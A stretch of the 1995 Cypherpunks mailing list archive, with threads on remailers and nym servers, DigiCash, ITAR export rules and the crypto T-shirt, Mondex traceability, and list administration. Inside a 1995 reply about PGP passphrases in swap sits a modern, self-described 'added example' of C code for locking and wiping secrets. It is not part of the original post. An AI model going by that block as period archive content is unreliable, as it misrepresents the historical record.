From: loki@obscura.com (Lance Cottrell)
Date: Thu, 26 Oct 1995 14:20:32 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <acb4d4fe0f02100433de@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


>Lance Cottrell writes:
>> If all nym servers were standardized to run from the same account name
>> (nymserve for example) the remailers could be configured to only deliver
>> final hops to addresses with that username.
>
>A detail I missed before: the remailers used in pseudonym reply blocks must
>somehow deliver replies to the True Name (verinymous ?) address of the holder
>of the pseudonym. I suppose they could all finally be routed to the
>pseudonymizer, which would deliver the messages directly to the intended
>recipient (holder of the pseudonym).
>
>-Futplex <futplex@pseudonym.com>


They could also end up getting dumped in a message pool. Perhaps all (or most)
nym servers could operate mailing list message pools. Anyone could
subscribe to the pool, and any nym could have its mail directed to that
pool. It should not be too difficult to rig a procmail script to try to
decrypt all mail from that list, and deliver those that could be decrypted.

        -Lance


----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 26 Oct 1995 14:21:19 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <acb4d64d11021004827b@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

How open is the protocol? Is there an API for it? Does anyone know how big
the coins are? There will have to be room for one per header in Mixmaster.
Do they vary in size, or are all coins identical? There is so much stuff to
try to keep track of all at once! :/

        -Lance (going down in a blaze of questions) Cottrell


At 5:20 PM 10/23/95, sameer wrote:
>        With the release of digicash I hope that we can soon make this
>stuff for-pay and much of the spam problem will be fixed. (Not all of
>it, of course.)
>        (I am rather hesitant to set up an account with Mark Twain
>though.. $2,500 min balance and not FDIC insured?)
>
>
<SNIP>

        -Lance
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 26 Oct 1995 14:38:13 +0800
To: cypherpunks@toad.com
Subject: [Noise] Paranoia in the Comics
Message-ID: <199510260626.XAA04340@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


This has no real crypto relevance, but some anarchistic relevance.

Sometimes you find anti-government paranoia in the strangest of places...
In the Ziggy strip for 10/25/95, Ziggy is in a Psychiatrist's office.  The
shrink is stating "You're afraid of the government, are you?  I'm required
to report that sort of thing you know."

You can tell the state of distrust of the state when you see such things in
a generally bland and spineless strip like Ziggy.  What next? Little Billy
from Family Circus bringing home a copy of the Anarchists Cookbook?  Charlie
Brown getting his phone tapped by Louie Freeh?  Garfield joining the EFF?
The mind boggles...
|       Visualize a world without lawyers!        | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 26 Oct 1995 14:45:30 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <acb323bd030210041822@[205.199.118.202]>
Message-ID: <308F2B18.6BDA@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin wrote:
> 
> I agree strongly with Tim May that this (fun) little joke has gone far
> enough.  I enjoyed it while it lasted, but the CJR was clearly frivolous,
> the T-Shirt was clearly not a munition, IMHO, and that's that.  Write up
> the experience, post it on the web somewhere (I'll provide a space if you
> need it), and call it a day.

  Should they also reject the same content (RSA-PERL) delivered
in any of the following ways:

	Printed on paper
	Printed on paper in OCR font
	Printed on paper in barcode
	Printed on paper with magnetic ink (like checks)

  The lines being drawn here seem very arbitrary.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 26 Oct 1995 15:14:02 +0800
To: loki@obscura.com (Lance Cottrell)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <acb4d64d11021004827b@[137.110.24.250]>
Message-ID: <199510260659.XAA18815@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Heh. See suggestion #1 in the Hack Digicash
promotion. "Reverse-engineer the protocol." The protocol is unknown, I
don't even know the format of the coins. I am sending in my account
application tomorrow.
	(i should sub to that nyms list.. majordomo?)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 26 Oct 1995 14:37:35 +0800
To: don@cs.byu.edu
Subject: Re: Linux security issues
In-Reply-To: <199510260304.VAA00205@wero.byu.edu>
Message-ID: <Pine.SUN.3.90.951026011633.3314A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


	 I don't see what this has to do with Linux. The question should
be: does the PGP pass phrase ever appear in a swap partition/file?
Well, the swap space is an extension of memory, forming part of the
virtual memory system. Obviously PGP needs to read the passphrase into memory.
And I am sure it goes out of its way to not keep it there for long. But on
a loaded system PGP might get swapped out the moment it reads the passphrase.
Furthermore, if the system happens to crash at that instant the
passphrase will be kept in the swap space. But this is true for any piece
of memory, PGP passphrase or not.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Wed, 25 Oct 1995 don@cs.byu.edu wrote:

> Has anyone heard of any information on the Linux swap partition,
> for example, if it does me the favor of storing my pgp passphrase?
>  
> Anyone who's interested in compiling PGP under ELF, add ASMDEF="-DSYSV"
> to the end of their linux make line.
> 
> Don
> 
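
The swap exposure discussed in this message is what page locking addresses. The following is an added example, not part of the original post and not PGP's code: POSIX C that holds a secret in mlock()ed memory, disables core dumps, and wipes the buffer before release. The type secret_buf and all function names are hypothetical, and the passphrase in main() is constructed.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE            /* MAP_ANONYMOUS on glibc */
#endif
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <unistd.h>

/* Hypothetical container for a secret held in page-locked memory. */
typedef struct {
    unsigned char *data;   /* page-aligned storage */
    size_t         cap;    /* capacity, rounded up to whole pages */
    int            locked; /* 1 if mlock() succeeded, 0 if refused */
} secret_buf;

/* Zero through a volatile pointer so the stores are not removed as dead. */
static void secure_zero(void *p, size_t n)
{
    volatile unsigned char *v = (volatile unsigned char *)p;
    while (n--) *v++ = 0;
}

/* A crash would otherwise write process memory to a core file. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Map whole pages and ask the kernel to keep them out of swap. */
int secret_alloc(secret_buf *sb, size_t want)
{
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0 || want == 0) return -1;
    size_t pg = (size_t)page;
    size_t cap = ((want + pg - 1) / pg) * pg;
    void *p = mmap(NULL, cap, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return -1;
    sb->data = p;
    sb->cap = cap;
    /* mlock() can be refused (RLIMIT_MEMLOCK); record it so the caller
       can decide whether to continue without the guarantee. */
    sb->locked = (mlock(p, cap) == 0);
    return 0;
}

/* Copy a secret in; refuses without copying if it does not fit. */
int secret_store(secret_buf *sb, const void *src, size_t n)
{
    if (n > sb->cap) return -1;
    memcpy(sb->data, src, n);
    return 0;
}

/* Count bytes that still hold data; 0 after a wipe. */
size_t secret_nonzero_bytes(const secret_buf *sb)
{
    size_t i, count = 0;
    for (i = 0; i < sb->cap; i++)
        if (sb->data[i] != 0) count++;
    return count;
}

/* Overwrite the secret as soon as it is no longer needed. */
void secret_wipe(secret_buf *sb)
{
    secure_zero(sb->data, sb->cap);
}

/* Wipe first, then unlock and unmap. */
void secret_free(secret_buf *sb)
{
    if (sb->data == NULL) return;
    secret_wipe(sb);
    if (sb->locked) munlock(sb->data, sb->cap);
    munmap(sb->data, sb->cap);
    sb->data = NULL;
    sb->cap = 0;
    sb->locked = 0;
}

int main(void)
{
    const char demo[] = "constructed passphrase"; /* sample input, not real */
    secret_buf sb;

    if (disable_core_dumps() != 0) perror("setrlimit");
    if (secret_alloc(&sb, 256) != 0) { perror("secret_alloc"); return 1; }
    if (!sb.locked) fprintf(stderr, "warning: buffer is not locked, may be swapped\n");

    secret_store(&sb, demo, strlen(demo));
    /* ... derive the key from sb.data here ... */
    secret_wipe(&sb);
    printf("bytes left after wipe: %zu\n", secret_nonzero_bytes(&sb));
    secret_free(&sb);
    return 0;
}
```

Page locking covers the buffer only: copies made by terminal or stdio buffering before the secret reaches it are outside its protection, and a suspend-to-disk image can still contain locked pages.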




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 26 Oct 1995 17:31:40 +0800
To: Mark <mark@lochard.com.au>
Subject: Re: Mandatory ID in California?
In-Reply-To: <199510260643.AA26567@junkers.lochard.com.au>
Message-ID: <Pine.ULT.3.91.951026020632.27266W-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Oct 1995, Mark wrote:

> >"States may not authorize arrest...for failing to produce identification..."
> >       Kolender v. Lawson 461 U.S. 352 (1983)
> >
> >"...may not compel an answer and they must allow the person to leave 
> >after a reasonable brief period of time...."  - - ibid
> 
> How about INS coming into the equation?  Do they have additional powers 
> which let them put your butt in a bad imitation of a Faraday cage?

The powers of the INS have been the subject of much litigation. I used to
study immigration law and policy, but that part of my brain has fallen
into disuse in the last five years. I could probably dig up some
references from old papers, though. I believe the INS has its own special
definitions of probable cause. 

Section 10 of Proposition 187, which was passed by the ever-so-enlightened
people of California last November, empowers the police to incarcerate
without charge anyone who can not produce the two forms of identification
required to prove legal residence. Fortunately, 187 is so Unconstitutional
on its face that multiple injunctions against the enforcement of every one
of its provisions were ordered within 30 minutes of 187's receiving the
Governor's signature. 

Today, many jurisdictions in California prohibit state & local officials
from turning people over to the INS. It's not good for public health and
safety for the alleged illegal people to be afraid to call the cops, or a
doctor. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Thu, 26 Oct 1995 15:14:35 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <v02120d06acb4ee63f448@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 11:30 PM 10/25/95, Jeff Weinstein wrote:

>  Should they also reject the same content (RSA-PERL) delivered
>in any of the following ways:
>
>        Printed on paper
>        Printed on paper in OCR font
>        Printed on paper in barcode
>        Printed on paper with magnetic ink (like checks)
>
>  The lines being drawn here seem very arbitrary.

        FWIW, in principle I agree with Michael and Tim: 90% of the point
of the lark was the absurdity of a T-shirt being a "munition." OTOH, the
arbitrariness of ITAR enforcement--regardless of the form of the CJRs
filed--is very troubling. When the USG so selectively enforces federal law,
one has to wonder what criterion is informing the selection. And this
"little" adventure could (IANAL, etc.) have a bright side: if the CJR were
submitted in a verifiable way (courier, certified, etc.) and the agency in
question had documentably refused to examine the materials submitted or to
take the application seriously, wouldn't this weaken any subsequent effort
to prosecute in another, more practical case involving the same code? If
so, maybe something halfway between a T-shirt and a book--y'all can figure
out what--encoded with machine-readable source for PGP might be in order.
In order not for some silly thread but, rather, for a meticulously
documented CJR, with an eye toward slowly upping the ante: submit the exact
same code in a variety of less and less absurd formats until the USG
chooses to deal with it--all the while presuming that their failure to
consider a CJR in this or that format constituted a de facto approval for
export.

ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erik Bataller <bataller@eit.COM>
Date: Thu, 26 Oct 1995 19:41:17 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCEMENT: sepp-talk mailing list
Message-ID: <Pine.SOL.3.91.951026042253.12008C-100000@viper>
MIME-Version: 1.0
Content-Type: text/plain


The sepp-talk mailing list is a forum for comments and discussion
regarding the Secure Electronic Payment Protocol (SEPP), proposed 
by MasterCard to support credit card payments over the Internet.
The SEPP specification is available for review from the MasterCard 
home page:

    http://www.mastercard.com

The CommerceNet consortium operates this mailing list as a service 
to the Internet community.

To subscribe to the sepp-talk mailing list, send email to:

                majordomo@commerce.net

...with a message body of:

                subscribe sepp-talk <your full name>

You should receive a confirmation message which includes instructions 
for unsubscribing from the list.

Shortly, CommerceNet will provide a WWW archive of this list on its
server.  A notice will be sent to the mailing list.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 26 Oct 1995 23:23:27 +0800
To: cypherpunks@toad.com
Subject: Re: [Noise] Paranoia in the Comics
Message-ID: <199510261014.GAA22116@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:27 PM 10/25/95 -0700, you wrote:
>This has no real crypto relevance, but some anarchistic relevance.
>
>Sometimes you find anti-government paranoia in the strangest of places...
>In the Ziggy strip for 10/25/95, Ziggy is in a Psychiatrist's office.  The
>shrink is stating "You're afraid of the government, are you?  I'm required
>to report that sort of thing you know."

Ziggy has long been a libertarian/right winger.  Note a Sunday strip of a
few years ago.  Ziggy bends over and looks closely at some red ants who are
carrying picket signs reading "Down with Communism", "Freedom Now", etc.
Ziggy observes "It had to happen sometime."

Since we are being semi-irrelevant here, yesterday's Broom Hilda strip was
good for the net "Universal Access" wars.  Broom Hilda sits down at a
computer to take a ride on the Information Superhighway.  The computer says
"Sorry, the information superhighway is a toll road."  "What's the toll"?
"Brains."  So Broom Hilda gives up and sets off on a tour of the back roads
of America.

Note the proof that competition provides better service than
government-monopoly Universal Service.  After years of being one of the few
Local Telcos that charged residential customers metered rates for local
calls, NYNEX (New York Telephone) has announced some flat rate pricing
plans.  Nothing like a little local loop competition.   

DCF

"School Bus Safety - Are your children safe? - Story at 11:00" -- They're
safer on the bus than they are when they arrive at their local institution
for the mentally/morally defective.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <remailer-admin@ideath.goldenbear.com>
Date: Fri, 27 Oct 1995 11:26:07 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510261340.AA15989@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text/plain




_______________________


Copyright EMAP Computers, 1995


             Network Week, London, Vol 1 No. 8,  
                      25 October 1995

                         Page 1 Lead


     Electronic cash card system faces possible legal
                          action


               MONDEX BLOWS USERS' ANONYMITY

             By Gavin Clarke and Madeleine Acey



Mondex faces possible legal action after admitting
transactions made with its supposedly anonymous
electronic cash cards can be traced.

Launched in December by Natwest, Midland and BT,
the electronic card was promoted as easy to use and
as anonymous as cash, with no trace being left. It
was perceived that a significant percentage of the
public avoided credit and debit cards because they
preferred their spending habits to remain private.

Simon Davies, Visiting Professor of Law at Essex
University, has lodged a complaint with the Trading
Standards Board demanding that Mondex change
either the retailers' card readers or its promotional
material.

It has been revealed that the readers keep records of
up to 500 cards' identities. The customers can keep
a record of ten transactions.

The retailer sends the money to the bank through a
9,600 modem-based Mondex phone

Rob Jameson, Mondex project manager for the pilot
in Swindon, said "we can certainly trace where cards
have been used.

"There are degrees of control that I'm not prepared to
discuss.  There are other mechanisms in place but I
don't want to go into that."

Davies said this contradicted previous Mondex
publicity material. It said "In everyday use Mondex
transactions are anonymous, just like cash."

A Mondex spokesperson denied last week that the
company said its card offered anonymity. But the
same spokesperson said in February 1994 that the
card's anonymity would appeal to those with a
cash psychology, such as cab drivers and other
cash-in-hand business people.

Mondex entered a new phase last week with the
launch of specially designed public telephones that
will allow its 8,000 Swindon trial customers to
re-load their cards from their bank accounts.

The Data Protection Registrar said people using
Mondex and other smart cards should be made
aware of the uses to which their card information will
go.

----------

Photo of Mondex promotional material and caption :
Mondex card use can be traced, despite claims of
anonymity.

ends


--








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Fri, 27 Oct 1995 01:23:03 +0800
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Welcome to cypherpunks
Message-ID: <v01530500acb554f900b0@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



>>      Why am I getting this when I am already subscribed to the
>>list??????
>
>Because someone signed the list up to the list...probably inadvertently.
>They probably sent something to majordomo with a line like:
>
>subscribe cypherpunks cypherpunks@toad.com
>
>thinking it actually made sense for some reason...then again they might
>have done it on purpose.

Well, the Welcome message says this:

->If you ever want to remove yourself from this mailing list,
->you can send mail to "Majordomo@toad.com" with the following command
->in the body of your email message:
->
->    unsubscribe cypherpunks cypherpunks@toad.com

So it is but a small leap of logic to remove the 'un' in order to
subscribe, since to my knowledge the Welcome message does not tell you how
to subscribe. A human interface problem?


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 27 Oct 1995 01:33:44 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <acb323bd030210041822@[205.199.118.202]>
Message-ID: <199510261423.HAA10098@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein <jsw@netscape.com> writes:

>  Should they also reject the same content (RSA-PERL) delivered
>in any of the following ways:

>	Printed on paper
>	Printed on paper in OCR font
>	Printed on paper in barcode
>	Printed on paper with magnetic ink (like checks)

>  The lines being drawn here seem very arbitrary.

But lines are always arbitrary.  I posted about this a long time ago: it
is assault to hit a man with a baseball bat, but presumably not to hit
him with a feather.  Should we then ask if it is assault to hit him with
a straw hat, with a pillow, with a loaf of bread?  The lines which will
end up being drawn will also be quite arbitrary.  The line between day
and night is arbitrary but that does not mean that there is no difference
between day and night.  This whole exercise in line-drawing doesn't seem
that productive to me.

The appellate court has already ruled that restrictions on export of
printed materials do not violate First Amendment rights.  I wrote up one
of these, the Posey case, in
<URL:http://www.portal.com/~hfinney/cryp_export2.html>.  In that instance
the materials being exported were some manuals obtained from the US
government itself via the Freedom of Information Act!  The law in
question was not actually the ITARs but rather another one which applied
specifically to exports to South Africa, and which did not have the
public domain exemption.  The point though is that the court did not agree
that the First Amendment was relevant since the restrictions were
specifically on export and did not have any effect on domestic
distribution of the information.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 26 Oct 1995 19:41:12 +0800
To: Cypherpunks <froomkin@law.miami.edu>
Subject: Re: CJR returned to sender
In-Reply-To: <Pine.SUN.3.91.951025100419.15559D-100000@viper.law.miami.edu>
Message-ID: <m0t8QPi-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

: I agree strongly with Tim May that this (fun) little joke has gone far
: enough.  I enjoyed it while it lasted, but the CJR was clearly frivolous,
: the T-Shirt was clearly not a munition, IMHO, and that's that.  Write up
: the experience, post it on the web somewhere (I'll provide a space if you
: need it), and call it a day. 

I am afraid that I have to disagree with this.  The T-Shirt, or rather
the cryptographic software that is disclosed by the wearing of the
shirt, is just as much an item that falls within the ITAR's definition
of an item on the United States Munitions List as any other
cryptographic software.  The only way that wearing the T-Shirt without
a license from the censors in the Office of Defense Trade Controls
would _not_ be a violation of the ITAR would be if either (i) the
censors, in their totally arbitrary discretion issue a commodity
jurisdiction determination that the T-Shirt is not an item on the
United States Munitions List or (ii) the ITAR are determined to be
unconstitutional.

There is no exception in the ITAR for printed materials.  The fact
that in one case a book got a favorable commodity jurisdiction
determination and a CDrom did not is not evidence to the contrary, it
just shows how completely arbitrary the ODTC's commodity
jurisdiction determinations are.  Nor is there an exception in the
ITAR for T-Shirts.

Of course the cryptographic software on the T-Shirt is constitutionally
protected, so it is not, in the constitutional sense, a violation of any
law to wear the shirt in the presence of a foreigner.  But then it
wouldn't be a violation--in the constitutional sense--for me to disclose
that cryptographic program to the foreigner who wrote it in a
communication over the internet.  And I assure you that when I have
discussed their encryption programs with foreign authors by e-mail I
have always been very careful not to disclose their own programs to
them.

It may not have much to do with cryptography, but it has everything to
do with the First Amendment to the United States Constitution, that
speech in any form, even on the backs of T-Shirts, is protected.
Remember there is a leading First Amendment case involving a T-Shirt
inscribed with the immortal words:  ``Fuck the Draft''.

Even if requiring one to obtain a license, or a non-obstat, from the
censors before communicating cryptographic software to foreign persons
by publishing that software were not to be held unconstitutional per
se, a licensing scheme that does provide any way to get a license for a
T-Shirt or a book is clearly unconstitutional.  The government cannot
refuse to license speech simply because the medium on which the speech
is affixed is frivolous.

And the message communicated by the T-Shirt is clearly political, so
arguably that message is _more_ protected by the First Amendment than
the PGP program on a floppy disk.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 26 Oct 1995 20:04:43 +0800
To: cypherpunks@toad.com
Subject: FBI/CIA/NSA, let's merge them all into one.  [???!!!]
Message-ID: <Pine.SOL.3.91.951026074229.1987G-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


AP on 10/25/95:
 
FBI Gets CIA Help On Olympics

The FBI and CIA are working together to deal with "substantial" 
threats to security at next summer's Atlanta Olympics, top
administration officials told senators Wednesday. 

[...]

Sen. Bob Kerrey of Nebraska ... chided the FBI for seeking to 
build a $37 million code encryption center that he said 
would duplicate facilities operated by the National Security 
Agency. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 27 Oct 1995 02:46:01 +0800
To: cypherpunks@toad.com
Subject: Re: Fred, Fred, Fred: Enough already!
Message-ID: <199510261505.IAA08725@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:58 AM 10/24/95 -0400, Robert Hettinga wrote:
> Can we please talk to Dr. Fred, the Poster Child of the Informal Fallacy,
> if we *really* have to, off line?

Yes, please, will everyone please killfile Dr Fred.  I am tired of seeing
things that are glaringly obvious explained in painful detail to someone
who is reluctant to understand them.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 26 Oct 1995 20:27:32 +0800
To: www-buyinfo@allegra.att.com
Subject: Re: Let's Not Merge Mailing Lists, OK?
Message-ID: <v02120d01acb51bcb6fbf@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



I'm cc:-ing this to both lists just this once, because this message is more
or less administrative. I'm not trying to merge www-buyinfo with
cypherpunks.

tcmay@got.net (Timothy C. May) said:

>There is great danger in constantly "casting the net wider," in trying to
>reach more and more people. I understand the temptation for some on both
>lists to cross-post some messages. I urge that they do this, as Bob H. has
>done on occasion, by personally forwarding the message, with only _one_ of
>the lists getting it. (This because the real danger is as above, where
>multiple lists are in the recipient or cc: fields, and followups semi-spam
>multiple lists.)

I agree with Tim.

I've been doing one-way forwards from cypherpunks to www-buyinfo for most
of a year now.  Most of the people on www-buyinfo are business people who
understand that digital commerce *is* financial cryptography, but they
don't have time to read all of cypherpunks to find the e$ juicy-bits. When
I do this, I put a "(cpx)" in the subject line so that the sizable
community of cypherpunks on www-buyinfo can filter them out and won't have
to see double. I've gotten a lot of fan-mail for this, even though it's not
really in keeping with the original charter for www-buyinfo, which seems to
have been subsumed by other groups, like the e-payments list and others.
Recently Dave Kristol has said that he's going to retool www-buyinfo, and
when he does, I'm hoping to have set up my own structure of 3 hypermail
archived e$ lists (a netwide e$ digest, a discussion list, and a
newsletter). I'm talking to about 3 or 4 different people about it, and I
should have the details worked out within a few days, with an announcement
next week, if I'm lucky.

Anyway, I've sent a few messages in the opposite direction on occasion
(from www-buy to c'punx), but I do try to hold it down, mostly because
whatever the topic is, we've usually talked about it on cypherpunks before.
I should note, however, that there's a good-sized discussion, for www-buy,
anyway, going on over there about anonymity, which has heated up
over the past few days. I forwarded a message here from Nick Szabo as an
example of it yesterday. The cross-posting Tim's talking about is a result
of that discussion.

There's a whole lot of "what do we need anonymity for, anyway?" opinion in
the business community, and it should be addressed with as much reason as
possible, and not by shouting them down with moral arguments to the
contrary, no matter how right those moral arguments are. Fortunately, I
believe there's a great business case for anonymity, and frankly, there had
better be, because, in a cryptoanarchic geodesic economy like the one we're
fixing to have, nothing is going to survive without a market.

Anyway, like I said, I agree with Tim.  If you want to post to cypherpunks,
you should subscribe to cypherpunks, and suffer the firehose like the rest
of us have to do. However, those of us who are on both lists, especially
those of us longer-term cypherpunks like Hal, and Nick, and Adam Shostack,
should be the ones to forward messages, if any, to cypherpunks, because
they are the ones who know whether cypherpunks has seen this before.  For
instance, the posting of Nick Szabo's that I sent to cypherpunks was more
of a rah-rah exercise (no pun intended) than anything else. It was so well
thought out that I thought it bore passing around a bit. However, as an
actual contribution to the information content on cypherpunks, what Nick
said has been said on cypherpunks before, if not typically with such
eloquence.

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hroller <hroller@metronet.com>
Date: Thu, 26 Oct 1995 21:34:45 +0800
To: admin@alpha.c2.org
Subject: Anonymous Account Help
Message-ID: <Pine.HPP.3.90.951026075541.25974C-100000@fohnix.metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


I have been having problems trying to set up an account at
alpha.c2.org. I have followed all the instructions but am still unable to
get a reply or anything that works right. What am I doing wrong? This is 
what I have done so far. I am about to pull my hair out. I have been 
working on this for 2 days now. Anyway, 

1. Created a Reply Block like this:  
Request-Remailing-To: hroller@metronet.com 

2. I then encrypted it with remailer@replay.com's Public Key. I prepended it
with the "Encrypted: PGP".  

3. I then created the following message: 

From: hroller@alpha.c2.org 
Password: MyPassword 
Reply-Block: 
::
Anon-To: remailer@replay.com 

::
Encrypted: PGP 
-------Begin PGP Message---------- 
"The Encrypted Reply Block Message"  
------End PGP Message------------- 

4. I then sent it to "alias@alpha.c2.org".  

Then I wait. But never get anything from alpha.c2.org.  I have gotten 
some anonymous messages from replay, but they are still encrypted so 
I don't know what it is sending me. Any help you can supply would be
greatly appreciated.


hroller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 26 Oct 1995 20:35:34 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: [Noise] Paranoia in the Comics
In-Reply-To: <199510260626.XAA04340@desiree.teleport.com>
Message-ID: <199510261213.IAA11138@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Olsen writes:
> This has no real crypto relevance, but some anarchistic relevance.

Alan;

As much as I found the comment interesting, it probably belonged
somewhere like libernet-d, not here on cypherpunks.

[I'm posting this in public, as I do about one in ten such messages,
so that a wider audience of people will be discouraged from posting
such things in advance. Don't bother mailing me a message saying "you
are adding to the noise yourself, why not mail in private" -- I do
that 90% of the time. Sometimes the nose levels rise enough that I
feel that a few public mentions would do some good.]

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Fri, 27 Oct 1995 02:36:20 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <v02130501acb4edcd6bab@[204.131.233.49]>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin wrote:
>I agree strongly with Tim May that this (fun) little joke has gone far
>enough.  I enjoyed it while it lasted, but the CJR was clearly frivolous,
>the T-Shirt was clearly not a munition, IMHO, and that's that.  Write up
>the experience, post it on the web somewhere (I'll provide a space if you
>need it), and call it a day. 

The CJR for the t-shirts was not frivolous.  Not in the least.

Letting the NSA/Dept. of State off the hook on this one leaves them with
wiggle room.  The goal of filing these CJRs is to find out just where the
